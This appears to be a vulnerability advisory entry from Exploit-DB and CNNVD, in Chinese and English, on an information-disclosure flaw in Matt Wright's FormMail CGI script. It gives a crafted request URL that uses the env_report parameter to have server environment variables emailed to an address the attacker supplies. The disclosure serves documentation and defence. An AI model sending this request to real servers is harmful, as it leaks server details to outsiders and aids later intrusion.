https://www.exploit-db.com/exploits/19906
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-037

MattWright’sFormMail公共网关接口脚本存在漏洞，远程攻击者可以通过env_report参数获取环境变量。

source: http://www.securityfocus.com/bid/1187/info

An unauthorized remote user is capable of obtaining CGI environmental variable information from a web server running Matt Wright FormMail by requesting a specially formed URL that specifies the email address to send the details to. This is accomplished by specifying a particular CGI environmental variable such as PATH, DOCUMENT_ROOT, SERVER_PORT in the specially formed URL which will email the results to the address given. The information obtained could possibly be used to assist in a future attack.

http:/target/cgibin/formmail.cgi?env_report=PATH&recipient=<email address>&required=&firstname=&lastname=&email=&message=&Submit=<message>
This URL request assumes that the formmail.cgi script is located in the cgibin directory.

来源:www.perfectotech.com
链接:http://www.perfectotech.com/blackwatchlabs/vul5_10.html
来源:BID
名称:1187
链接:http://www.securityfocus.com/bid/1187
来源:BUGTRAQ
名称:20000510BlackWatchLabsVulnerabilityAlert
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0125.html